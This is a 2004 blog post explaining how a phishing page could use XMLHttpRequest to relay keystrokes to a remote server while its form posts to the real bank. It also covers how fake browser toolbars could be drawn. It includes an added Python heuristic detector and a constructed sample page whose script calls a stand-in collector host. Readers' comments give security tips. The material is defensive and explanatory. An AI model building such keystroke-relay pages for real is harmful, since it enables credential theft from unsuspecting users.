Thursday, December 30, 2004

Google Suggest and phishing attack

Google has a nice beta toy called Google Suggest, which predicts completions as you type search terms. What is interesting is the compact JavaScript on the page, which communicates in real time with a Google server to generate the suggestions. The secret is the XMLHttpRequest object, used to communicate with a server and get new information or instructions without refreshing the page.

I can see how such code could be used in a phishing attack: a phishing Web page, to which the user is directed via a fake email, can use similar JavaScript to transmit keystrokes to a remote server, even if the HTML form on the page posts the information (e.g., username and password) to the real authentication server. Anti-phishing technology that focuses on where the POST data is sent (i.e., technology implemented at the firewall or TCP/IP level) will not detect a problem.

Anti-phishing technology like Whole Security's Web CallerID works by looking at the URL from which the potentially fake page is loaded. However, using the trick I've outlined above and some cross-site scripting, the page can be served up from any number of locations - the only static component is the remote server where the keystrokes are sent. For an anti-phishing agent to detect this hack it would have to parse and understand the JavaScript on the fake page. Actually, Web CallerID is weak for another reason - a phisher can use JavaScript to modify the "chrome" on the browser, replacing the Web CallerID toolbar with a fake one that gives the OK signal. (This is true for any toolbar.)
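A crude version of the check the post says an anti-phishing agent would need, written here as an added example (it is not code from the post, from Google Suggest or from Web CallerID): given the HTML of a login page, find the host the form posts to, then look in the inline scripts for a keystroke handler, XMLHttpRequest use, and URL literals whose host differs from the form's host. All three together is flagged. The hosts bank.example and collector.example and both sample pages are constructed for the demonstration; the handler bodies are schematic, since only the pattern matters to the detector.

```python
"""Heuristic detector for the keystroke-relay pattern described in the post.

Added example, not part of the original page. Markup and hosts are constructed.
"""
import re
from urllib.parse import urlparse

# (a) keystroke handlers: HTML attributes (onkeyup="..."), property assignment
#     (form.onkeyup = fn) and addEventListener('keyup', ...)
KEY_EVENT_RE = re.compile(
    r"\bon(?:key(?:up|down|press)|input)\b"
    r"|addEventListener\(\s*['\"](?:key(?:up|down|press)|input)['\"]",
    re.I,
)
# (b) the XMLHttpRequest object, including the IE ActiveX spelling of the day
XHR_RE = re.compile(
    r"\bXMLHttpRequest\b|\bActiveXObject\(\s*['\"](?:Microsoft|Msxml2)\.XMLHTTP",
    re.I,
)
# (c) absolute URL literals inside scripts
URL_RE = re.compile(r"https?://[^\s'\"<>()]+", re.I)
FORM_ACTION_RE = re.compile(r"<form\b[^>]*\baction\s*=\s*['\"]([^'\"]+)['\"]", re.I)
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)


def host_of(url):
    """Lower-cased hostname of a URL, or '' if it has none."""
    return (urlparse(url).hostname or "").lower()


def analyse(html):
    """Return the evidence found on the page and whether it is flagged.

    'suspicious' is True only when a keystroke handler, XMLHttpRequest use and
    at least one script URL pointing away from the form's host all co-occur.
    """
    m = FORM_ACTION_RE.search(html)
    form_host = host_of(m.group(1)) if m else ""
    scripts = "\n".join(SCRIPT_RE.findall(html))
    key_handler = bool(KEY_EVENT_RE.search(html))
    uses_xhr = bool(XHR_RE.search(scripts))
    foreign_hosts = sorted(
        {host_of(u) for u in URL_RE.findall(scripts)} - {"", form_host}
    )
    return {
        "form_host": form_host,
        "key_handler": key_handler,
        "uses_xhr": uses_xhr,
        "foreign_hosts": foreign_hosts,
        "suspicious": key_handler and uses_xhr and bool(foreign_hosts),
    }


# Constructed sample: the pattern from the post. The form posts to the real
# bank, but a keystroke handler opens an XMLHttpRequest to an unrelated host.
PHISHING_PAGE = """
<html><body>
<form method="post" action="https://bank.example/login">
  <input name="user" onkeyup="relay(this)">
  <input name="pass" type="password" onkeyup="relay(this)">
</form>
<script>
function relay(f) {
  var r = new XMLHttpRequest();
  r.open("GET", "https://collector.example/s", true);  /* not the form's host */
  r.send(null);
}
</script>
</body></html>
"""

# Constructed sample: a legitimate page whose keystroke handler talks to the
# same host the form posts to (a Google-Suggest-style helper).
BENIGN_PAGE = """
<html><body>
<form method="post" action="https://bank.example/login">
  <input name="user" onkeyup="suggest(this)">
  <input name="pass" type="password">
</form>
<script>
function suggest(f) {
  var r = new XMLHttpRequest();
  r.open("GET", "https://bank.example/suggest?q=" + encodeURIComponent(f.value), true);
  r.send(null);
}
</script>
</body></html>
"""

if __name__ == "__main__":
    for name, page in (("phishing", PHISHING_PAGE), ("benign", BENIGN_PAGE)):
        print(name, analyse(page))
```

The regexes stand in for the real parsing the post calls for: a script that builds its URL from pieces, uses a relative path on a page served from the collector's own host, or relays data through an image request instead of XMLHttpRequest will not trip this version, and comparing exact hostnames rather than registrable domains will flag a bank's own CDN. It does show the point of the post, though: the tell is not where the form posts but where the page's scripts send data while the user types.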

For those who don't follow Internet security, we are in the midst of a sea change right now. In the past, viruses and the like were built and released just for fun, for hackers to gain a reputation. We are now entering a period where much of the hacking is done by criminals for the purpose of financial gain. This means that the next virus on your machine may be more than just an annoyance - it may be watching while you log into your online banking account.


Anonymous said...


When you think through matters of computer-Internet security, please remark when appropriate on precautions that we may readily adopt. Thanks.


Steve Hsu said...

My advice:

1) stop using IE - switch to Mozilla/Firefox

2) never trust emails linking to bank/financial sites. Go directly to the site by typing the URL yourself.

3) install anti-virus software (e.g. Norton), and run it regularly.

4) if you can manage it, switch to OS X or Linux, because Windows is very insecure. If you stay with XP, download the patches regularly.

The problem is, the vast majority of users (e.g., my mother) will follow none of 1-4!
